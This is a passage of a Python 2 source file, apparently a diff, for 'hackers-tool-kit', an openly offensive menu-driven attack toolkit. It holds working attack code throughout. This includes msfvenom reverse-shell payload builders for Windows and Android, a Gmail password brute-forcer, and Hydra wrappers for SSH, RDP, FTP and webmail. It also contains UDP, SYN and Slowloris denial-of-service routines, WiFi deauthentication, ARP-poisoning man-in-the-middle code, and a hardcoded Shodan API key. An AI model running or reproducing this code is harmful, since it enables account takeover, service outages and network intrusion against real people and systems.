]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + print N+""" _ _ _ _ _ _ _ + _ _ _ _ _ _ _ + | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ + | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| + | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ \033[91m + |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__|\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + os.system("python " + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') + os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) + os.system('echo "run\n" >> handler.rc') + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > 